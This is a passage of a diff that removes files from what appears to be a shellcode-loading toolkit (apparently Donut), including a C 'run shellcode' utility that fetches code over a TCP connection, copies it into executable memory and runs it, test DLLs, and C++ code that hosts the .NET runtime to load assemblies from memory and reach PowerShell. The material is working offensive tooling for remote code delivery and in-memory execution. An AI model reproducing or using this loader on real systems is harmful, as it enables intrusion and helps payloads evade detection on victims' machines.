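-*
-*F*/
-{
-struct addrinfo *list=NULL, *e=NULL;
-struct addrinfo hints;
-int r, t;
-
-// initialize winsock if windows
-#ifdef WIN
-WSADATA wsa;
-WSAStartup (MAKEWORD (2, 0), &wsa);
-#endif
-
-r=0;
-// set network address length to zero
-p->ai_addrlen = 0;
-
-// if no address supplied
-if (p->address==NULL)
-{
-// is it ipv4?
-if (p->ai_family==AF_INET) {
-p->v4.sin_family = AF_INET;
-p->v4.sin_port = htons((u_short)p->port_nbr);
-p->v4.sin_addr.s_addr = INADDR_ANY;
-p->ai_addr = (struct sockaddr*)&p->v4;
-p->ai_addrlen = sizeof (struct sockaddr_in);
-} else {
-// else it's ipv6
-p->v6.sin6_family = AF_INET6;
-p->v6.sin6_port = htons((u_short)p->port_nbr);
-p->v6.sin6_addr = in6addr_any;
-p->ai_addr = (struct sockaddr*)&p->v6;
-p->ai_addrlen = sizeof (struct sockaddr_in6);
-}
-} else {
-memset (&hints, 0, sizeof (hints));
-
-hints.ai_flags = AI_PASSIVE;
-hints.ai_family = p->ai_family;
-hints.ai_socktype = SOCK_STREAM;
-hints.ai_protocol = IPPROTO_TCP;
-
-// get all network addresses
-t=getaddrinfo (p->address, p->port, &hints, &list);
-if (t == 0)
-{
-for (e=list; e!=NULL; e=e->ai_next)
-{
-// copy to ipv4 structure
-if (p->ai_family==AF_INET) {
-memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
-p->ai_addr = (struct sockaddr*)&p->v4;
-} else {
-// ipv6 structure
-memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
-p->ai_addr = (struct sockaddr*)&p->v6;
-}
-// assign size of structure
-p->ai_addrlen = e->ai_addrlen;
-break;
-}
-freeaddrinfo (list);
-} else {
-xstrerror ("getaddrinfo");
-}
-}
-return p->ai_addrlen;
-}
-
-void debug(void *bin)
-{
-//
-//__builtin_trap();
-//raise(SIGTRAP);
-}
-
-// allocate read/write and executable memory
-// copy data from p->code and execute
-void xcode(args_t *p)
-{
-void *bin;
-int i;
-int fd[2048];
-
-if (p->code_len == 0) {
-printf("[ no code to execute.\n");
-return;
-}
-printf ("[ executing code...");
-
-#ifdef WIN
-bin=VirtualAlloc (0, p->code_len,
-MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-#else
-bin=mmap (0, p->code_len,
-PROT_EXEC | PROT_WRITE | PROT_READ,
-MAP_ANON | MAP_PRIVATE, -1, 0);
-#endif
-if (bin!=NULL)
-{
-memcpy (bin, p->code, p->code_len);
-// create file/socket descriptors to simulate real system
-// created interesting results on openbsd with limits
-// to how many files could be open at once..
-//
-if (p->sim) {
-#ifndef WIN
-for (i=0; i<p->sim && p->sim<2048; i++) {
-fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
-}
-#else
-// todo
-for (i=0; i<p->sim && p->sim<2048; i++) {
-}
-#endif
-}
-
-// debug the code?
-if (p->dbg) {
-#if defined(_WIN32) || defined(_WIN64)
-DebugBreak();
-#else
-raise(SIGTRAP);
-#endif
-}
-// execute
-((void(*)())bin)();
-printf("OK!\n");
-if (p->sim) {
-#ifndef WIN
-// close all descriptors
-for (i=0; i<p->sim && p->sim<2048; i++) {
-close(fd[i]);
-}
-#else
-// todo
-#endif
-}
-#ifdef WIN
-VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
-#else
-munmap (bin, p->code_len);
-#endif
-}
-}
-
-void send_data(args_t *p, int s) {
-FILE *fd;
-int outlen, len, opt;
-uint32_t sum;
-uint8_t buf[BUFSIZ];
-
-// open file for read in binary mode
-printf ("[ opening %s for read\n", p->file);
-fd = fopen(p->file, "rb");
-
-if (fd != NULL)
-{
-// send contents of file
-printf ("[ sending data\n");
-for (;;) {
-// read block
-outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
-// zero or less indicates EOF
-if (outlen <= 0) break;
-// send contents
-for (sum=0; sum<outlen; sum += len) {
-len=send (s, &buf[sum], outlen - sum, 0);
-if (len <= 0) break;
-}
-p->code_len += sum;
-if (outlen != sum) break;
-}
-printf ("[ sent %i bytes\n", p->code_len);
-fclose(fd);
-}
-}
-
-void recv_data(args_t *p, int s) {
-int opt, r;
-fd_set fds;
-struct timeval tv;
-void *pv;
-
-p->code_len = 0;
-p->code = malloc(BUFSIZ);
-
-// set to non-blocking mode
-#ifdef WIN
-opt=1;
-ioctlsocket (s, FIONBIO, (u_long*)&opt);
-#else
-opt=fcntl(s, F_GETFL, 0);
-fcntl(s, F_SETFL, opt | O_NONBLOCK);
-#endif
-// keep reading until remote disconnects or we run out of memory
-printf ("[ receiving data\n");
-
-for (;;) {
-FD_ZERO(&fds);
-FD_SET(s, &fds);
-
-tv.tv_sec = 5;
-tv.tv_usec = 0;
-r = select(FD_SETSIZE, &fds, 0, 0, &tv);
-
-if (r <= 0) {
-printf ("[ waiting for data timed out or failed\n");
-break;
-}
-// receive a block
-r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
-if (r <= 0) break;
-p->code_len += r;
-// resize buffer
-pv = realloc(p->code, p->code_len + BUFSIZ);
-// on error, free pointer
-if(pv == NULL) {
-p->code_len = 0;
-free(p->code);
-p->code = NULL;
-printf("[ error: out of memory.\n");
-break;
-}
-p->code = pv;
-}
-if(p->code_len != 0) {
-printf ("[ received %i bytes\n", p->code_len);
-}
-}
-
-//
-int ssr (args_t *p)
-/**
-* PURPOSE : send a shellcode or receive one from remote system and execute it
-*
-* RETURN : 0 or length of shellcode sent/received
-*
-* NOTES : None
-*
-*F*/
-{
-int s, opt, r, t;
-fd_set fds;
-struct timeval tv;
-
-p->code_len=0;
-
-// create socket
-printf ("[ creating socket\n");
-s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
-if (s < 0) return 0;
-
-// ensure we can reuse socket
-t=1;
-setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
-
-// bind to port
-printf ("[ binding to port %s\n", p->port);
-r = bind(s, p->ai_addr, p->ai_addrlen);
-if (r == 0) {
-// listen
-r = listen (s, 1);
-if (r == 0) {
-printf ("[ waiting for connections on %s\n", addr2ip(p));
-if (r == 0) {
-t = accept(s, p->ai_addr, &p->ai_addrlen);
-printf ("[ accepting connection from %s\n", addr2ip(p));
-if (t > 0) {
-if (p->tx_mode == RSC_SEND) {
-send_data(p, t);
-} else {
-recv_data(p, t);
-xcode(p);
-}
-}
-}
-// close socket to peer
-shutdown(t, SHUT_RDWR);
-close(t);
-} else {
-perror("listen");
-}
-} else {
-perror("bind");
-}
-// close listening socket
-shutdown(s, SHUT_RDWR);
-close(s);
-
-return p->code_len;
-}
-
-/**F*****************************************************************/
-int csr (args_t *p)
-/**
-* PURPOSE : opens connection to remote system and sends shellcode
-*
-* RETURN : 0 or 1
-*
-* NOTES : None
-*
-*F*/
-{
-int s, r, opt;
-fd_set fds;
-struct timeval tv;
-
-printf ("[ creating socket\n");
-s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
-if (s < 0) return 0;
-
-// try connect to remote
-printf ("[ connecting to %s\n", addr2ip(p));
-r = connect(s, p->ai_addr, p->ai_addrlen);
-
-if (r == 0) {
-if (p->tx_mode==RSC_SEND) {
-send_data(p, s);
-} else {
-recv_data(p, s);
-xcode(p);
-}
-} else {
-xstrerror("connect");
-}
-printf ("[ closing connection\n");
-shutdown(s, SHUT_RDWR);
-close(s);
-return 1;
-}
-
-/**F*****************************************************************/
-void xfile(args_t *p)
-/**
-* PURPOSE : read contents of shellcode and attempt to execute it locally
-*
-* RETURN : Nothing
-*
-* NOTES : None
-*
-*F*/
-{
-FILE *fd;
-int len;
-void *pv;
-
-p->code_len = 0;
-p->code = NULL;
-
-printf ("[ reading code from %s\n", p->file);
-fd = fopen(p->file, "rb");
-
-if (fd == NULL) {
-xstrerror("fopen(\"%s\")", p->file);
-return;
-}
-// read contents of file
-for (;;) {
-// first loop? allocate block
-if(p->code == NULL) {
-p->code = malloc(BUFSIZ);
-}
-// read a block of data
-len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
-if (len <= 0) break;
-p->code_len += len;
-// resize buffer for next read
-pv = realloc(p->code, p->code_len + BUFSIZ);
-
-if(pv == NULL) {
-p->code_len = 0;
-free(p->code);
-p->code = NULL;
-printf("[ error: out of memory!.\n");
-break;
-}
-p->code = pv;
-}
-fclose(fd);
-
-if(p->code_len != 0) {
-xcode(p);
-}
-}
-
-#ifdef WIN
-void load_modules(char *names) {
-HMODULE mod;
-char *p = strtok(names, ";,");
-
-while (p != NULL) {
-printf ("[ loading %s...", p);
-mod = LoadLibrary(p);
-
-printf ("%s\n", mod==NULL ? "FAILED" : "OK");
-
-p = strtok(NULL, ";,");
-}
-}
-#endif
-
-/**F*****************************************************************/
-void usage (void) {
-printf ("\n usage: runsc <address> [options]\n");
-printf ("\n -4 Use IP version 4 (default)");
-printf ("\n -6 Use IP version 6");
-printf ("\n -l Listen mode (required when listening on specific interface)");
-#ifdef WIN
-printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
-#endif
-printf ("\n -f <file> Read PIC from <file>");
-printf ("\n -s <count> Simulate real process by creating file descriptors");
-printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
-printf ("\n -x Execute PIC (requires -f)");
-printf ("\n\n Press any key to continue . . .");
-getchar ();
-
-exit (0);
-}
-
-/**F*****************************************************************/
-char* getparam (int argc, char *argv[], int *i) {
-int n=*i;
-if (argv[n][2] != 0) {
-return &argv[n][2];
-}
-if ((n+1) < argc) {
-*i=n+1;
-return argv[n+1];
-}
-printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
-exit (0);
-}
-
-void parse_args (args_t *p, int argc, char *argv[]) {
-int i;
-char opt;
-
-// for each argument
-for (i=1; i<argc; i++)
-{
-// is this option?
-if (argv[i][0]=='-' || argv[i][1]=='/')
-{
-// get option value
-opt=argv[i][1];
-switch (opt)
-{
-case '4':
-p->ai_family=AF_INET;
-break;
-case '6': // use ipv6 (default is ipv4)
-p->ai_family=AF_INET6;
-break;
-case 'x': // execute PIC, requires -f
-p->mode=RSC_EXEC;
-break;
-case 'd': // debug the code
-p->dbg=1;
-break;
-case 'f': // file
-p->file=getparam(argc, argv, &i);
-break;
-case 'l': // listen for incoming connections
-p->mode=RSC_SERVER;
-break;
-#ifdef WIN
-case 'm': // windows only, loads modules required by shellcode
-p->modules = getparam(argc, argv, &i);
-break;
-#endif
-case 's': // create file descriptors before execution
-p->sim=atoi(getparam(argc, argv, &i));
-break;
-case 'p': // port number
-p->port=getparam(argc, argv, &i);
-p->port_nbr=atoi(p->port);
-break;
-case '?': // display usage
-case 'h':
-usage ();
-break;
-default:
-printf ("[ unknown option %c\n", opt);
-usage();
-break;
-}
-} else {
-// assume it's hostname or ip
-p->address=argv[i];
-p->mode=RSC_CLIENT;
-}
-}
-}
-
-int main (int argc, char *argv[]) {
-args_t args;
-struct stat st;
-
-#ifdef WIN
-//
-PVOID OldValue=NULL;
-WSADATA wsa;
-
-//Wow64DisableWow64FsRedirection (&OldValue);
-LoadLibrary("ws2_32");
-LoadLibrary("advapi32");
-
-WSAStartup(MAKEWORD(2,0), &wsa);
-#endif
-
-setbuf(stdout, NULL);
-setbuf(stderr, NULL);
-
-memset (&args, 0, sizeof(args));
-
-// set default parameters
-args.address = NULL;
-args.file = NULL;
-args.ai_family = AF_INET;
-args.port = DEFAULT_PORT;
-args.port_nbr = atoi(args.port);
-args.mode = -1;
-args.tx_mode = -1;
-args.sim = 0;
-args.dbg = 0;
-
-printf ("\n[ run shellcode v0.2\n");
-
-parse_args(&args, argc, argv);
-
-// check if we have file parameter and it accessible
-if (args.file!=NULL) {
-if (stat (args.file, &st)) {
-printf ("[ unable to access %s\n", args.file);
-return 0;
-}
-}
-
-#ifdef WIN
-if (args.modules != NULL) {
-load_modules(args.modules);
-}
-#endif
-// if mode is executing
-if (args.mode == RSC_EXEC) {
-if (args.file != NULL) {
-xfile(&args);
-return 0;
-} else {
-printf ("\n[ you've used -x without supplying file with -f");
-return 0;
-}
-}
-if (init_network(&args)) {
-// if no file specified, we receive and execute data
-args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
-
-// if mode is -1, we listen for incoming connections
-if (args.mode == -1) {
-args.mode=RSC_SERVER;
-}
-
-// if no file specified, set to receive one
-if (args.tx_mode == -1) {
-args.tx_mode = RSC_RECV;
-}
-
-if (args.mode == RSC_SERVER) {
-ssr (&args);
-} else {
-csr (&args);
-}
-}
-if(args.code_len != 0) {
-free(args.code);
-}
-return 0;
-}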
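--- a/payload/test/api_test.c
+++ b/payload/test/api_test.c
@@ -1,37 +0,0 @@
-
-#define UNICODE
-#include <windows.h>
-
-#include "donut.h"
-#pragma comment(lib, "user32.lib")
-
-void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
-typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
-
-int main(void) {
-HMODULE m;
-_DonutApiW DonutApiW;
-WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
-
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-param[0], param[1], param[2], param[3]);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-
-m = LoadLibrary(L"call_api_dll.dll");
-
-if(m != NULL) {
-DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
-if(DonutApiW != NULL) {
-call_api((FARPROC)DonutApiW, 4, param);
-}
-}
-return 0;
-}
-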
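--- a/payload/test/call_api_dll.c
+++ b/payload/test/call_api_dll.c
@@ -1,35 +0,0 @@
-#define WIN32_LEAN_AND_MEAN
-#define UNICODE
-
-#include <windows.h>
-#include "donut.h"
-
-#pragma comment(lib, "user32.lib")
-
-__declspec(dllexport)
-VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %s\r"
-L"param[1] : %s\r"
-L"param[2] : %s\r"
-L"param[3] : %s\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL APIENTRY DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}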
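--- a/payload/test/hello.c
+++ b/payload/test/hello.c
@@ -1,56 +0,0 @@
-#define UNICODE
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <inttypes.h>
-
-#include <windows.h>
-#pragma comment(lib, "user32.lib")
-#pragma comment(lib, "shell32.lib")
-
-__declspec(dllexport)
-VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
-PROCESS_INFORMATION pi;
-STARTUPINFO si;
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-
-ZeroMemory(&si, sizeof(si));
-si.cb = sizeof(si);
-CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
-}
-
-__declspec(dllexport)
-VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
-WCHAR msg[4096];
-
-_snwprintf(msg, ARRAYSIZE(msg),
-L"param[0] : %ws\r"
-L"param[1] : %ws\r"
-L"param[2] : %ws\r"
-L"param[3] : %ws\r",
-arg0, arg1, arg2, arg3);
-
-MessageBox(NULL, msg, L"Donut Test", MB_OK);
-}
-
-__declspec(dllexport)
-BOOL WINAPI DllMain(HMODULE hModule,
-DWORD ul_reason_for_call,
-LPVOID lpReserved) {
-switch (ul_reason_for_call) {
-case DLL_PROCESS_ATTACH:
-MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
-break;
-case DLL_THREAD_ATTACH:
-case DLL_THREAD_DETACH:
-case DLL_PROCESS_DETACH:
-break;
-}
-return TRUE;
-}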
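--- a/payload/test/hello.cs
+++ b/payload/test/hello.cs
@@ -1,16 +0,0 @@
-// A Hello World! program in C#.
-using System;
-namespace HelloWorld
-{
-class Hello
-{
-static void Main()
-{
-Console.WriteLine("Hello World!");
-
-// Keep the console window open in debug mode.
-Console.WriteLine("Press any key to exit.");
-Console.ReadKey();
-}
-}
-}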
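--- a/payload/test/rdt.cpp
+++ b/payload/test/rdt.cpp
@@ -1,440 +0,0 @@
-
-// code to implement hooking ProcessExit from unmanaged code
-// https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
-//
-#include <windows.h>
-#include <oleauto.h>
-#include <mscoree.h>
-#include <comdef.h>
-#include <propvarutil.h>
-#include <metahost.h>
-
-#include <cstdio>
-#include <cstdint>
-#include <cstring>
-#include <cstdlib>
-#include <sys/stat.h>
-
-#import "mscorlib.tlb" raw_interfaces_only
-#import "shdocvw.dll"
-
-#pragma comment(lib, "mscoree.lib")
-
-void my_function(void *evt) {
-printf("Received event\n");
-}
-
-void DumpMethods(mscorlib::_TypePtr type) {
-mscorlib::_MethodInfoPtr mi;
-mscorlib::_ParameterInfoPtr pi;
-mscorlib::_TypePtr ptype;
-SAFEARRAY *sa, *params;
-HRESULT hr;
-LONG i, j, cnt, pcnt, lcnt, ucnt;
-BSTR name;
-VARIANT vt;
-VARTYPE var;
-
-hr = type->GetMethods(
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Static |
-mscorlib::BindingFlags_Public),
-&sa);
-
-if(hr == S_OK) {
-SafeArrayGetLBound(sa, 1, &lcnt);
-SafeArrayGetUBound(sa, 1, &ucnt);
-
-cnt = (ucnt - lcnt + 1);
-
-for(i=0; i<cnt; i++) {
-hr = SafeArrayGetElement(sa, &i, (void*)&mi);
-if(hr == S_OK) {
-mi->get_name(&name);
-printf("%ws(", name);
-hr = mi->GetParameters(&params);
-if(hr == S_OK) {
-SafeArrayGetLBound(params, 1, &lcnt);
-SafeArrayGetUBound(params, 1, &ucnt);
-
-pcnt = (ucnt - lcnt + 1);
-printf("%i", pcnt);
-for(j=0; j<pcnt; j++) {
-hr = SafeArrayGetElement(params, &j, (void*)&pi);
-
-// VARTYPE should be VT_UNKNOWN
-hr = SafeArrayGetVartype(params, &var);
-BSTR meth = SysAllocString(L"ParameterType");
-DISPID id;
-// hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
-//DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
-printf("HRESULT : %lx\n", hr);
-}
-}
-printf(")\n");
-}
-}
-}
-}
-
-void rundotnet(void *code, size_t len) {
-HRESULT hr;
-ICLRMetaHost *icmh;
-ICLRRuntimeInfo *icri;
-ICorRuntimeHost *icrh;
-IUnknownPtr iu;
-mscorlib::_AppDomainPtr ad;
-mscorlib::_AssemblyPtr as, as1, as2, as3;
-mscorlib::_MethodInfoPtr mi;
-mscorlib::_EventInfoPtr nfo;
-mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
-mscorlib::_DelegatePtr delegate;
-mscorlib::_ParameterInfoPtr param;
-mscorlib::_EventHandlerPtr handler;
-VARIANT v1, v2, v_ptr, v_type, ret;
-SAFEARRAY *sa, *sa2, *sav;
-SAFEARRAYBOUND sab;
-BOOL loadable;
-LONG idx;
-
-printf("CoCreateInstance(ICorRuntimeHost).\n");
-
-hr = CLRCreateInstance(
-CLSID_CLRMetaHost,
-IID_ICLRMetaHost,
-(LPVOID*)&icmh);
-
-if(SUCCEEDED(hr)) {
-printf("ICLRMetaHost::GetRuntime\n");
-
-hr = icmh->GetRuntime(
-L"v4.0.30319",
-IID_ICLRRuntimeInfo, (LPVOID*)&icri);
-
-if(SUCCEEDED(hr)) {
-printf("ICLRRuntimeInfo::IsLoadable\n");
-hr = icri->IsLoadable(&loadable);
-
-if(SUCCEEDED(hr) && loadable) {
-printf("ICLRRuntimeInfo::GetInterface\n");
-
-hr = icri->GetInterface(
-CLSID_CorRuntimeHost,
-IID_ICorRuntimeHost,
-(LPVOID*)&icrh);
-} else return;
-} else return;
-} else return;
-
-printf("ICorRuntimeHost::Start()\n");
-hr = icrh->Start();
-if(SUCCEEDED(hr)) {
-printf("ICorRuntimeHost::GetDefaultDomain()\n");
-hr = icrh->GetDefaultDomain(&iu);
-if(SUCCEEDED(hr)) {
-printf("IUnknown::QueryInterface()\n");
-hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
-if(SUCCEEDED(hr)) {
-BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
-// ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
-BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
-
-BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
-
-hr = ad->Load_2(str1, &as1); // load automation
-hr = ad->Load_2(strX, &as3); // load interop services
-printf("Loading System.Management.Automation : %lx\n", hr);
-hr = ad->Load_2(str2, &as2); // load mscorlib
-
-BSTR alloc = SysAllocString(L"Create");
-BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
-hr = as1->GetType_2(marshal, &mars);
-
-printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
-
-DumpMethods(mars);
-
-// to retrieve a method, the SAFEARRAY is of IUnknown types
-// this method doesn't accept anything, so just allocate array for it
-sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
-
-hr = mars->GetMethod(alloc,
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
-NULL, // Binder
-sav, // SAFEARRAY(_Type*)
-NULL, // Modifiers
-&mi); // MethodInfo
-
-printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
-
-v1.vt = VT_EMPTY;
-VariantClear(&ret);
-
-hr = mi->Invoke_3(
-v1,
-NULL, // arguments to method
-&ret); // return value from method
-
-printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
-
-// at this point, we have the powershell object. we just need to call AddScript
-// method, but this is an IDisposable
-
-sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
-BSTR object = SysAllocString(L"System.Object");
-
-as2->GetType_2(object, &ptr);
-idx = 0;
-SafeArrayPutElement(sav, &idx, ptr);
-
-BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
-BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
-hr = as3->GetType_2(mars_str, &mars);
-
-printf("Marshal : %p\n", (PVOID)mars);
-
-hr = mars->GetMethod(get_obj,
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
-NULL, // Binder
-sav, // SAFEARRAY(_Type*)
-NULL, // Modifiers
-&mi); // MethodInfo
-
-printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
-
-sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
-idx = 0;
-SafeArrayPutElement(sav, &idx, &ret.punkVal);
-
-v1.vt = VT_EMPTY;
-VARIANT unk;
-VariantClear(&unk);
-
-hr = mi->Invoke_3(
-v1,
-sav, // arguments to method
-&unk); // return value from method
-
-printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
-getchar();
-return;
-
-// SAFEARRAY(_Type*)
-sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
-
-// add System.IntPtr
-BSTR str4 = SysAllocString(L"System.IntPtr");
-as2->GetType_2(str4, &ptr);
-//DumpMethods(ptr);
-idx = 0;
-hr = SafeArrayPutElement(sav, &idx, ptr);
-
-// add System.Type
-BSTR str5 = SysAllocString(L"System.Type");
-as2->GetType_2(str5, &type);
-idx = 1;
-SafeArrayPutElement(sav, &idx, type);
-
-BSTR str6 = SysAllocString(L"GetIUnknownForObject");
-BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
-hr = as1->GetType_2(str3, &mars);
-
-hr = mars->GetMethod(str6,
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
-NULL, // Binder
-sav, // SAFEARRAY(_Type*)
-NULL, // Modifiers
-&mi); // MethodInfo
-
-printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
-
-BSTR str9 = SysAllocString(L"ProcessExit");
-BSTR strA = SysAllocString(L"System.AppDomain");
-
-hr = as2->GetType_2(strA, &evt);
-printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
-
-hr = evt->GetEvent(str9,
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
-&nfo);
-
-printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
-
-hr = nfo->get_EventHandlerType(&evt);
-printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
-
-BSTR type_name, base_name;
-mscorlib::_TypePtr base_type, ref_type;
-
-evt->get_name(&type_name);
-evt->get_BaseType(&base_type);
-base_type->get_name(&base_name);
-
-wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
-
-printf("my_function = %p\n", (void*)my_function);
-
-// SAFEARRAY(VARIANT)
-sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
-
-VariantClear(&v_ptr);
-V_BYREF(&v_ptr) = (PVOID)my_function;
-V_VT(&v_ptr) = VT_INT;
-
-idx = 0;
-SafeArrayPutElement(sav, &idx, &v_ptr);
-
-BSTR strZ = SysAllocString(L"System.MultiDelegate");
-hr = as2->GetType_2(strZ, &type);
-printf("System.Delegate = %lx, %p\n", hr, (void*)type);
-
-idx = 1;
-V_VT(&v_type) = VT_UNKNOWN;
-V_UNKNOWN(&v_type) = type;
-SafeArrayPutElement(sav, &idx, &type);
-
-v1.vt = VT_EMPTY;
-VariantClear(&ret);
-
-printf("Calling GetDelegateForFunctionPointer\n");
-hr = mi->Invoke_3(
-v1,
-sav, // arguments to method
-&ret); // return value from method
-
-printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
-
-/**if(hr != S_OK) {
-printf("Failed to obtain delegate\n");
-return;
-}*/
-
-printf("Delegate : %p\n", ret.punkVal);
-
-hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
-printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
-
-hr = ad->add_ProcessExit(handler);
-printf("HRESULT : %08lx\n", hr);
-
-sab.lLbound = 0;
-sab.cElements = len;
-printf("SafeArrayCreate()\n");
-sa = SafeArrayCreate(VT_UI1, 1, &sab);
-
-if(sa != NULL) {
-CopyMemory(sa->pvData, code, len);
-printf("AppDomain::Load_3()\n");
-hr = ad->Load_3(sa, &as);
-if(SUCCEEDED(hr)) {
-printf("Assembly::get_EntryPoint()\n");
-hr = as->get_EntryPoint(&mi);
-if(SUCCEEDED(hr)) {
-v1.vt = VT_NULL;
-v1.plVal = NULL;
-printf("MethodInfo::Invoke_3()\n");
-hr = mi->Invoke_3(v1, NULL, &v2);
-mi->Release();
-}
-as->Release();
-}
-SafeArrayDestroy(sa);
-}
-ad->Release();
-}
-iu->Release();
-}
-icrh->Stop();
-}
-icrh->Release();
-}
-
-int main(int argc, char *argv[])
-{
-void *mem;
-struct stat fs;
-FILE *fd;
-
-if(argc != 2) {
-printf("usage: rundotnet <.NET assembly>\n");
-return 0;
-}
-
-// 1. get the size of file
-stat(argv[1], &fs);
-
-if(fs.st_size == 0) {
-printf("file is empty.\n");
-return 0;
-}
-
-// 2. try open assembly
-fd = fopen(argv[1], "rb");
-if(fd == NULL) {
-printf("unable to open \"%s\".\n", argv[1]);
-return 0;
-}
-// 3. allocate memory
-mem = malloc(fs.st_size);
-if(mem != NULL) {
-// 4. read file into memory
-fread(mem, 1, fs.st_size, fd);
-// 5. run the program from memory
-rundotnet(mem, fs.st_size);
-// 6. free memory
-free(mem);
-}
-// 7. close assembly
-fclose(fd);
-
-return 0;
-}
-
-/**
-sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
-BSTR i32 = SysAllocString(L"System.Int32");
-
-as2->GetType_2(i32, &ptr);
-idx = 0;
-SafeArrayPutElement(sav, &idx, ptr);
-
-BSTR alloc = SysAllocString(L"AllocHGlobal");
-BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
-hr = as1->GetType_2(marshal, &mars);
-
-hr = mars->GetMethod(alloc,
-(mscorlib::BindingFlags)
-(mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
-NULL, // Binder
-sav, // SAFEARRAY(_Type*)
-NULL, // Modifiers
-&mi); // MethodInfo
-
-printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
-
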